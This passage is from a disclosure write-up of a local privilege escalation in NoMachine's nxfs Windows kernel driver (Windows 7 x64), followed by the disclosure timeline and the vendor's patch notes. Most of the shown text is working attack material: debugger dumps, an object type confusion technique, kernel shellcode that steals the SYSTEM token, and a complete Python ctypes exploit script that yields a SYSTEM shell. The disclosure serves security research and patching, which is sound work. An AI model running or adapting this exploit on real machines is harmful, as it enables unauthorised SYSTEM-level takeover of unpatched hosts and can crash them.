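bytes_read = ENTRIES * POINTER_SIZE  # bytes the kernel copies from our buffer
buffer_len = len(b"C" * 2048 * 8)    # size of spray_buff in the script

print(bytes_read, buffer_len, buffer_len >= bytes_read)
```

Under that assumption the call consumes 8192 bytes of the 16384 byte buffer, so the buffer is comfortably large enough and every sprayed qword is 0x4343434343434343.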

We then set a breakpoint in the vulnerable function just after the prologue and examine the stack:

kd> dq rsp L100
fffff880`0535b800 fffff800`02a3de80 43434343`43434343
fffff880`0535b810 fffff880`0535b9b8 fffff880`0535bb60
fffff880`0535b820 fffffa80`04360260 fffff880`028ac87c
fffff880`0535b830 00000000`00000010 00000000`00000344
fffff880`0535b840 fffff880`0535b850 00000000`00000018
fffff880`0535b850 fffffa80`02160940 00000000`00000000
fffff880`0535b860 fffffa80`043e99e0 fffff880`028ab6e1
fffff880`0535b870 00000000`c0000002 fffffa80`02160940
fffff880`0535b880 00000000`00395a98 00000000`00000000
fffff880`0535b890 fffffa80`02be15c0 fffffa80`043a8408
fffff880`0535b8a0 fffffa80`c0000002 fffffa80`043a82f0
fffff880`0535b8b0 00000000`00000001 00000000`00000030
fffff880`0535b8c0 fffffa80`043a82f0 fffff800`02be5f97
fffff880`0535b8d0 fffffa80`043a8408 fffff880`0535bb60
fffff880`0535b8e0 fffffa80`043bcd50 fffffa80`043bcd50
fffff880`0535b8f0 00000000`746c6644 fffff880`0535b928
fffff880`0535b900 fffff880`0535b968 00000000`00000000
fffff880`0535b910 00000000`00000000 43434343`43434343
fffff880`0535b920 00000030`04360201 fffffa80`043bcd50
fffff880`0535b930 00000000`00000030 00000000`00000000
fffff880`0535b940 fffffa80`043a82f0 43434343`43434343
fffff880`0535b950 43434343`43434343 fffffa80`043bcda0
fffff880`0535b960 43434343`43434343 0012019f`00000000
fffff880`0535b970 fffffa80`043bce00 fffffa80`02be15c0
fffff880`0535b980 43434343`43434343 fffffa80`043bcde8
fffff880`0535b990 43434343`43434343 fffffa80`043bcd50

We can see we clearly have some values left over on the stack, it looks slightly promising. If we then move on to this block of code:

RSI is going to get a value from the stack, and this is what we want to control. Unfortunately it turns out we can’t get any controllable values there:

kd> dq rsp+80
fffff880`0535b880 00000000`00395a98 00000000`00000000

This value must be placed on the stack after our spraying, or it just isn’t at a location we manage to influence. Our next thought was to try and map this address, adding the following code to our script:


MEM_COMMIT  = 0x00001000
MEM_RESERVE = 0x00002000
PAGE_EXECUTE_READWRITE = 0x00000040

address = c_void_p(0x00395a98)
size = c_size_t(0x1000) #RegionSize is a SIZE_T, which is 8 bytes on x64
proc = windll.kernel32.GetCurrentProcess()

print "[+] Allocating memory at 0x%x" %address.value

dwStatus = windll.ntdll.NtAllocateVirtualMemory(c_void_p(proc),
                                            byref(address), 0,
                                            byref(size),
                                            MEM_RESERVE|MEM_COMMIT,
                                            PAGE_EXECUTE_READWRITE)

print "[+] NtAllocVM returned %x" %c_ulong(dwStatus).value
print "\tsize 0x%x" %size.value
if dwStatus != 0:
    sys.exit(-1)
print "\t%s"%hex(address.value)

Unfortunately, on the Windows 7 VM we can’t reliably map this address: sometimes the allocation succeeds, and sometimes it fails with a STATUS_CONFLICTING_ADDRESSES error. The next problem is that this value isn’t fixed; it changes on every execution.

We obviously can’t map 0x4141414141414141, so we spray the memory allocation with 0x0000000041414141, sometimes we get it spot on:

Other times it is completely off:

Again, determined to carry on, and on a complete whim we thought “I wonder what happens if I open a whole load of handles to the device”. For whatever reason this gives us the ability to influence this value, if we open up say 10,000 handles we go from a value in the 0x370000-0x400000 range to much higher values:

Clearly this value isn’t representative of the number of handles that are open, but whatever happens inside the kernel when these handles are created is influencing it. This means that if we increase it substantially, with a bit of trial and error we can hope to guess its range. Bear in mind that we have issues trying to map 3 byte addresses, so we increase the number of handles substantially. Creating 900,000 gives the following:

We found that 900,000 handles gives us reliable control of the value for rsi, however there is still the chance that we end up pointing to 0x4141414000000000 instead of 0x0000000041414140, and we couldn’t determine how to control this.
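The two outcomes contain the same 32 bit pattern, just in different halves of the 64 bit value, and only one of them is an address we could ever map. The Python 3 sketch below illustrates this; the user space upper bound is our assumption for Windows 7 x64, and both helper names are hypothetical.

```python
import struct

USER_SPACE_TOP = 0x000007FFFFFFFFFF  # assumed top of user space on Windows 7 x64


def split_qword(value):
    """Return the (low, high) 32-bit halves of a 64-bit value."""
    low, high = struct.unpack("<II", struct.pack("<Q", value))
    return low, high


def is_user_mappable(address):
    """True if the address lies in the assumed user-mode range."""
    return 0 < address <= USER_SPACE_TOP


for candidate in (0x0000000041414140, 0x4141414000000000):
    low, high = split_qword(candidate)
    print(hex(candidate), hex(low), hex(high), is_user_mappable(candidate))
```

In the good case the pattern sits in the low dword and the address is mappable; in the bad case it sits in the high dword and the resulting address is outside anything user mode can allocate, which is why that outcome ends in a crash rather than code execution.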

If we do get the correct value for rsi, then we set the byte at 0x41414140-0x18 to 5 as before, and then the program exits, giving us the following error:

FAULTING_IP:
nt!SepTokenDeleteMethod+27
fffff800`02b93937 8b4218 mov eax,dword ptr [rdx+18h]

CONTEXT: fffff88004cafda0 -- (.cxr 0xfffff88004cafda0)
rax=0000000041414138 rbx=0000000000000000 rcx=0000000041414140
rdx=0000000000000000 rsi=fffffa800184bd70 rdi=0000000041414140
rip=fffff80002b93937 rsp=fffff88004cb0780 rbp=fffff8a00206cc40
r8=fffff8a006198940 r9=0000000000372650 r10=0000000000372650
r11=fffff88004cb0808 r12=0000000041414110 r13=fffffa8008667060
r14=0000000000000000 r15=fffff8a00206cc40
iopl=0 nv up ei pl zr na po nc
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00010246
nt!SepTokenDeleteMethod+0x27:
fffff800`02b93937 8b4218 mov eax,dword ptr [rdx+18h] ds:002b:00000000`00000018=????????

Unfortunately, we couldn’t see anywhere in SepTokenDeleteMethod that would allow us to gain code execution. After a bit of research we stumbled on a presentation by Nikita Tarakanov (http://2014.zeronights.org/assets/files/slides/data-only-pwning-windows-kernel.pptx); the section that caught our attention is where they mention object type confusion. Put simply, we control the value that indexes ObTypeIndexTable, and with a value of 5 we are pointing to a Token object:

If however, right before our process terminates, we set this value to 1, then the following code path is hit in ObpCloseHandleTableEntry:

fffff800`02bc23ed lea rbx,[nt!ObTypeIndexTable (fffff800`02a75340)] ;rbx gets address of index table
<…Snip…>
fffff800`02bc23fe movzx eax,byte ptr [r12+18h] ;al gets our controllable index value.
fffff800`02bc2404 mov r13,r8
fffff800`02bc2407 mov rdi,rdx
fffff800`02bc240a mov rbx,qword ptr [rbx+rax*8] ;index the table with our offset.
fffff800`02bc240e mov r15,rcx
fffff800`02bc2411 cmp qword ptr [rbx+0A8h],0 ;check the object type+0xa8 is not null
fffff800`02bc2419 jne nt!ObpCloseHandleTableEntry+0xe4 (fffff800`02bc24a4)
fffff800`02bc241f mov ebx,dword ptr [rdi]
<…Snip…>
fffff800`02bc24a4 mov rax,qword ptr gs:[188h]
fffff800`02bc24ad cmp qword ptr [rax+70h],r8 ;grab the current processes _EPROCESS
fffff800`02bc24b1 jne nt! ?? ::NNGAKEGL::`string'+0x35700 (fffff800`02b3520e)
fffff800`02bc24b7 movzx r9d,byte ptr [rsp+0B0h]
fffff800`02bc24c0 lea rdx,[r12+30h]
fffff800`02bc24c5 mov r8,r10
fffff800`02bc24c8 mov rcx,r13
fffff800`02bc24cb call qword ptr [rbx+0A8h] ;call our pointer

Notice that the second entry in the table (index 1) is 0xbad0b0b0. This is a userland address, so mapping it and then storing some value at 0xbad0b0b0+0xA8 should give us an exception with rip equal to our value.
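
The addresses involved can be cross-checked with a little arithmetic. The sketch below is not part of the original exploit. It assumes the layout implied by the listing above: the object body sits 0x30 bytes after its header (`lea rdx,[r12+30h]`), the type index byte lives at header+0x18 (`movzx eax,byte ptr [r12+18h]`), and the called pointer is read from type+0xA8. The constant and function names are made up for illustration, and the code is written for Python 3.

```python
# Offsets read off the ObpCloseHandleTableEntry listing (Win7 SP1 x64).
HEADER_TO_BODY = 0x30      # lea rdx,[r12+30h]
TYPE_INDEX_OFFSET = 0x18   # movzx eax,byte ptr [r12+18h]
CALL_SLOT_OFFSET = 0xA8    # call qword ptr [rbx+0A8h]


def header_from_body(body):
    """Address of the object header for a given object body pointer."""
    return body - HEADER_TO_BODY


def type_index_address(body):
    """Address of the one-byte type index for a given object body pointer."""
    return header_from_body(body) + TYPE_INDEX_OFFSET


fake_object = 0x41414140   # userland pointer that ends up as the Object argument
fake_type = 0xBAD0B0B0     # value stored at ObTypeIndexTable[1]

header = header_from_body(fake_object)
index_addr = type_index_address(fake_object)
call_slot = fake_type + CALL_SLOT_OFFSET

print(hex(header), hex(index_addr), hex(call_slot))
```

The header address comes out as 0x41414110, which matches r12 in the register dump above, and the type index address is 0x41414128, i.e. 0x41414140-0x18.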

At this point we know that we can reliably control rip in ring 0. If we store a legitimate pointer at 0xbad0b0b0+0xA8 that points to some shellcode, we should be able to steal a SYSTEM token. The shellcode is very similar to our x86 token stealing code: the owning process of our code is python.exe, whose parent is cmd.exe, so we again write the stolen token into the parent process.
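
As a small aside, this is how a 64-bit pointer is laid out in little-endian memory. The sketch is illustrative only (Python 3, with a hypothetical helper name `pack_pointer`); it uses the shellcode address 0x42424240 that the exploit listing maps later on.

```python
import struct


def pack_pointer(value):
    """Encode a 64-bit pointer the way it is stored in little-endian memory."""
    return struct.pack("<Q", value)


shellcode_ptr = pack_pointer(0x42424240)
low_dword, high_dword = shellcode_ptr[:4], shellcode_ptr[4:]

print(repr(low_dword), repr(high_dword))
```

The low four bytes are `\x40BBB` and the high four are zero. Freshly committed pages are zero-filled, which is why writing only the low four bytes into a new mapping still yields a full 8-byte pointer.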

The shellcode is as follows (offsets are for Win7 SP1 x64):

;Win7 x64 kernel shellcode
;Steal the SYSTEM token and store it
;in the token of the current process's parent
section .text
mov rax, [gs:0x188]			;get a pointer to the current thread (KTHREAD)
mov rax, [rax + 0x70] 		;get a pointer to current EPROCESS
mov rbx, [rax + 0x290]		;get the parent's PID

Loop1:
	mov rax, [rax + 0x188]  ;go to next process
	sub rax, 0x188			
	cmp [rax + 0x180], rbx	;cmp PID to parent pid 
	jne Loop1
	
mov rcx, rax 				;keep pointer to parent process
mov rdx, 0x4				;SYSTEM pid

Loop2:
	mov rax, [rax + 0x188];
	sub rax, 0x188;
	cmp [rax + 0x180], rdx   ;is this a system process?
	jne Loop2;
	
mov rax, [rax + 0x208]		 ;grab the SYSTEM token
mov [rcx + 0x208], rax		 ;replace the parent process's token

xor rax,rax ;nt_success

ret;
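
The logic of the two loops can be modelled in user mode. The following is a toy simulation, not kernel code: a dict stands in for memory, the fake records are placed at made-up addresses, and the helper names are hypothetical. Only the four offsets come from the shellcode above. Unlike the real list, the toy list has no separate list head, and like the shellcode it loops forever if the PID is never found.

```python
# Offsets used by the shellcode (Win7 SP1 x64).
PID, LINKS, TOKEN, PARENT_PID = 0x180, 0x188, 0x208, 0x290


def build_memory(processes):
    """Lay out fake process records in a dict acting as memory."""
    bases = [0x1000 * (i + 1) for i in range(len(processes))]
    mem = {}
    for i, (pid, ppid, token) in enumerate(processes):
        base = bases[i]
        next_base = bases[(i + 1) % len(bases)]
        mem[base + PID] = pid
        mem[base + PARENT_PID] = ppid
        mem[base + TOKEN] = token
        # The forward link points at the list field of the next record.
        mem[base + LINKS] = next_base + LINKS
    return mem, bases


def find_by_pid(mem, start, pid):
    """Mirror of Loop1/Loop2: follow the link, rebase, compare the PID."""
    cur = start
    while True:
        cur = mem[cur + LINKS] - LINKS
        if mem[cur + PID] == pid:
            return cur


def steal_token(mem, current):
    """Copy the token of PID 4 into the parent of the current process."""
    parent = find_by_pid(mem, current, mem[current + PARENT_PID])
    system = find_by_pid(mem, parent, 4)
    mem[parent + TOKEN] = mem[system + TOKEN]
    return parent


# (pid, parent pid, token): System, cmd.exe, python.exe
mem, bases = build_memory([(4, 0, 0xAAAA), (1000, 4, 0x1111), (2000, 1000, 0x2222)])
parent = steal_token(mem, bases[2])
print(hex(parent), hex(mem[parent + TOKEN]))
```

After the call, the record standing in for cmd.exe carries the same token value as the record with PID 4, while the python.exe record is unchanged.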

We map a region for our shellcode, write the shellcode into it, and gain a SYSTEM shell.
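
One detail worth checking in the assembled bytes (they appear in the Python listing further down) is the `\x75\xEA` encoding of each `jne`. A short jump stores a signed 8-bit displacement relative to the address of the next instruction. The sketch below, written for Python 3 with a hypothetical helper `rel8`, confirms that the displacement points back to the first instruction of the loop.

```python
import struct

# One loop body, copied byte for byte from the exploit's shellcode string.
loop_body = (
    b"\x48\x8B\x80\x88\x01\x00\x00"   # mov rax, [rax + 0x188]
    b"\x48\x2D\x88\x01\x00\x00"       # sub rax, 0x188
    b"\x48\x39\x98\x80\x01\x00\x00"   # cmp [rax + 0x180], rbx
    b"\x75\xEA"                       # jne Loop1
)


def rel8(byte_value):
    """Interpret one byte as a signed 8-bit jump displacement."""
    return struct.unpack("b", bytes([byte_value]))[0]


displacement = rel8(loop_body[-1])
print(displacement, len(loop_body))
```

The displacement is -22 and the loop body, including the two-byte `jne`, is 22 bytes long, so the jump lands exactly on the `mov rax, [rax + 0x188]` at the top of the loop.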

As we have mentioned, this is not 100% reliable: if rsi is at the wrong offset, we end up causing a denial of service. The code, which was a nice introduction to kernel exploitation with Python, is as follows:

from ctypes import *
from ctypes.wintypes import *
import struct
import sys
import os

MEM_COMMIT = 0x00001000
MEM_RESERVE = 0x00002000
PAGE_EXECUTE_READWRITE = 0x00000040
GENERIC_READ  = 0x80000000
GENERIC_WRITE = 0x40000000
OPEN_EXISTING = 0x3
STATUS_INVALID_HANDLE = 0xC0000008

shellcode_len = 90
s = ""
s += "\x65\x48\x8B\x04\x25\x88\x01\x00"		#mov rax, [gs:0x188]
s += "\x00"
s += "\x48\x8B\x40\x70"						#mov rax, [rax + 0x70]
s += "\x48\x8B\x98\x90\x02\x00\x00"			#mov rbx, [rax + 0x290]	
s += "\x48\x8B\x80\x88\x01\x00\x00"			#mov rax, [rax + 0x188]
s += "\x48\x2D\x88\x01\x00\x00"				#sub rax, 0x188
s += "\x48\x39\x98\x80\x01\x00\x00"			#cmp [rax + 0x180], rbx
s += "\x75\xEA"								#jne Loop1
s += "\x48\x89\xC1"							#mov rcx, rax
s += "\xBA\x04\x00\x00\x00"					#mov rdx, 0x4
s += "\x48\x8B\x80\x88\x01\x00\x00"			#mov rax, [rax + 0x188]
s += "\x48\x2D\x88\x01\x00\x00"				#sub rax, 0x188
s += "\x48\x39\x90\x80\x01\x00\x00"			#cmp [rax + 0x180], rdx
s += "\x75\xEA"								#jne Loop2
s += "\x48\x8B\x80\x08\x02\x00\x00"			#mov rax, [rax + 0x208]	
s += "\x48\x89\x81\x08\x02\x00\x00"			#mov [rcx + 0x208], rax
s += "\x48\x31\xC0"							#xor rax,rax
s += "\xc3"									#ret
shellcode = s


'''
* Convert a python string to PCHAR
@Param string - the string to be converted.
@Return - a PCHAR that can be used by winapi functions.
'''
def str_to_pchar(string):
	pString = c_char_p(string)

	return pString

'''
* Map memory in userspace using NtAllocateVirtualMemory
@Param address - The address to be mapped, such as 0x41414141.
@Param size - the size of the mapping.
@Return - a tuple containing the base address of the mapping and the size returned.
'''
def map_memory(address, size):
	temp_address = c_void_p(address)
	size = c_uint(size)

	proc = windll.kernel32.GetCurrentProcess()
	nt_status = windll.ntdll.NtAllocateVirtualMemory(c_void_p(proc),
                                            byref(temp_address), 0,
                                            byref(size),
                                            MEM_RESERVE|MEM_COMMIT,
                                            PAGE_EXECUTE_READWRITE)

	#The mapping failed, let the calling code know
	if nt_status != 0:
		return (-1, c_ulong(nt_status).value)
	else:
		return (temp_address, size)

'''
* Write to some mapped memory.
@Param address - The address in memory to write to.
@Param size - The size of the write.
@Param buffer - A python buffer that holds the contents to write.
@Return - the number of bytes written.
'''
def write_memory(address, size, buffer):
	temp_address = c_void_p(address)
	temp_buffer = str_to_pchar(buffer)
	proc = c_void_p(windll.kernel32.GetCurrentProcess())
	bytes_ret = c_ulong()
	size = c_uint(size)

	windll.kernel32.WriteProcessMemory(proc,
									temp_address,
									temp_buffer,
									size,
									byref(bytes_ret))

	return bytes_ret

'''
* Get a handle to a device by its name. The calling code is responsible for 
* checking the handle is valid.
@Param device_name - a string representing the name, ie \\\\.\\nxfs-net....
'''
def get_handle(device_name):
	return windll.kernel32.CreateFileA(device_name,
                                GENERIC_READ | GENERIC_WRITE,
                                0,
                                None,
                                OPEN_EXISTING,
                                0,
                                None)

def main():
	print "[+] Attempting to exploit uninitialised stack variable, this has a chance of causing a bsod!"

	print "[+] Mapping the regions of memory we require"

	#Try and map the first 3 critical regions, if any of them fail we exit.
	address_1, size_1 = map_memory(0x14c00000, 0x1f0000)
	if address_1 == -1:
		print "[x] Mapping 0x14c00000 failed with error %x" %size_1
		sys.exit(-1)

	address_2, size_2 = map_memory(0x41414141, 0x100000)
	if address_2 == -1:
		print "[x] Mapping 0x41414141 failed with error %x" %size_2
		sys.exit(-1)

	address_3, size_3 = map_memory(0xbad0b0b0, 0x1000)
	if address_3 == -1:
		print "[x] Mapping 0xbad0b0b0 failed with error %x" %size_3
		sys.exit(-1)

	#this will hold our shellcode
	sc_address, sc_size = map_memory(0x42424240, 0x1000)
	if sc_address == -1:
		print "[x] Mapping 0x42424240 failed with error %x" %sc_size
		sys.exit(-1)

	#Now we write certain values to those mapped memory regions
	print "[+] Writing data to mapped memory..."
	#the first write involves storing a pointer to our shellcode 
	#at offset 0xbad0b0b0+0xa8
	buff = "\x40BBB" #0x42424240
	bytes_written = write_memory(0xbad0b0b0+0xa8, 4, buff)
	
	write_memory(0x42424240, shellcode_len, shellcode)

	#the second write involves spraying the first memory address with pointers
	#to our second mapped memory.
	print "\t spraying uninitialised pointer memory with userland pointers"
	
	buff = "\x40AAA" #0x0000000041414140
	for offset in range(4, size_1.value, 8):
		temp_address = address_1.value + offset
		write_memory(temp_address, 4, buff)

	#the third write simply involves setting 0x41414140-0x18 to 0x5
	#this ensures the kernel creates a handle to a TOKEN object.
	print "[+] Setting TOKEN type index in our userland pointer"
	buff = "\x05"
	temp_address = 0x41414140-0x18
	write_memory(temp_address, 1, buff)

	print "[+] Writing memory finished, getting handle to first device"
	handle = get_handle("\\\\.\\nxfs-709fd562-36b5-48c6-9952-302da6218061")

	if handle == -1: #CreateFileA returns INVALID_HANDLE_VALUE (-1) on failure, not an NTSTATUS
		print "[x] Couldn't get handle to \\\\.\\nxfs-709fd562-36b5-48c6-9952-302da6218061"
		sys.exit(-1)

	#if we have a valid handle, we now need to send ioctl 0x222014
	#this creates a new device for which ioctl 0x222030 can be sent
	in_buff = struct.pack("<I", 0x190) +  struct.pack("<I", 0x1) + "AA"
	in_buff = str_to_pchar(in_buff)
	out_buff = str_to_pchar("A"*0x90)
	bytes_ret = c_ulong()

	ret = windll.kernel32.DeviceIoControl(handle,
                                      0x222014,
                                      in_buff,
                                      0x10,
                                      out_buff,
                                      0x90,
                                      byref(bytes_ret),
                                      0)
	if ret == 0:
		print "[x] IOCTL 0x222014 failed"
		sys.exit(-1)

	print "[+] IOCTL 0x222014 returned success"

	#get a handle to the next device for which we can send the vulnerable ioctl.
	print "[+] Getting handle to \\\\.\\nxfs-net-709fd562-36b5-48c6-9952-302da6218061{709fd562-36b5-48c6-9952-302da6218061}"
	handle = get_handle("\\\\.\\nxfs-net-709fd562-36b5-48c6-9952-302da6218061{709fd562-36b5-48c6-9952-302da6218061}")

	if handle == -1: #CreateFileA returns INVALID_HANDLE_VALUE (-1) on failure, not an NTSTATUS
		print "[x] Couldn't get handle"
		sys.exit(-1)

	#this stage involves attempting to manipulate the Object argument on the stack.
	#we found that making repeated calls to CreateFileA increased this value.
	print "[+] Got handle to second device, now generating a load more handles"
	for i in range(0, 900000):
		temp_handle = get_handle("\\\\.\\nxfs-net-709fd562-36b5-48c6-9952-302da6218061{709fd562-36b5-48c6-9952-302da6218061}")

	#coming towards the end, we send ioctl 0x222030, this has the potential to bluescreen the system.
	#we don't care about the return code.
	print "[+] Sending IOCTL 0x222030"
	in_buff = str_to_pchar("A"*0x30)
	out_buff = str_to_pchar("B"*0x30)

	windll.kernel32.DeviceIoControl(handle,
                                    0x222030,
                                    in_buff,
                                    0x30,
                                    out_buff,
                                    0x30,
                                    byref(bytes_ret),
                                    0)

	#finally, we confuse the kernel by setting our object type index to 1.
	#index 1 resolves to 0xbad0b0b0, so the pointer at 0xbad0b0b0+0xa8 is the one ObpCloseHandleTableEntry calls
	print "[+] Setting our object type index to 1"
	temp_address = 0x41414140-0x18
	write_memory(temp_address, 1, "\x01")

	#The process should now exit, where the kernel will attempt to clean up our dodgy handle
	#This will cause .....

if __name__ == '__main__':
	main()
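
For readers unfamiliar with the two IOCTL values used above, they follow the standard Windows CTL_CODE layout: device type in bits 16-31, required access in bits 14-15, function number in bits 2-13 and transfer method in bits 0-1. The decoder below is a small illustrative helper (Python 3, hypothetical name `decode_ioctl`), not something taken from the driver.

```python
def decode_ioctl(code):
    """Split a Windows IOCTL code into its CTL_CODE fields."""
    return {
        "device_type": (code >> 16) & 0xFFFF,
        "access": (code >> 14) & 0x3,
        "function": (code >> 2) & 0xFFF,
        "method": code & 0x3,
    }


first = decode_ioctl(0x222014)
second = decode_ioctl(0x222030)

for name, fields in (("0x222014", first), ("0x222030", second)):
    print(name, {key: hex(value) for key, value in fields.items()})
```

Both codes decode to device type 0x22 (FILE_DEVICE_UNKNOWN), access 0 (FILE_ANY_ACCESS) and method 0 (METHOD_BUFFERED); they differ only in the function number, 0x805 versus 0x80C.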

 

Credit

Tim Carrington – @__invictus_ – as part of Fidus’ UK penetration testing team.

 

Timeline

Initial request for contact – 8/2/18
Response from vendor, advisory sent – 8/2/18
Vendor responds with their technical analysis and a proposed fix, to which we agreed – 13/2/18
CVE assigned – 13/2/18
Patch released; vendor announces it on social media and publishes reports on its official website – 20/2/18

 

NoMachine’s Comment

NoMachine provided the following announcements in relation to our security advisory:

https://www.nomachine.com/SU02P00195

https://www.nomachine.com/SU02P00194

https://www.nomachine.com/TR02P08408

And the patch guidelines are:

“Users can upgrade their Windows installations via automatic software updates or by downloading and installing the new packages from our web site: https://www.nomachine.com/download or their Customer Area if they are customers with a valid license.”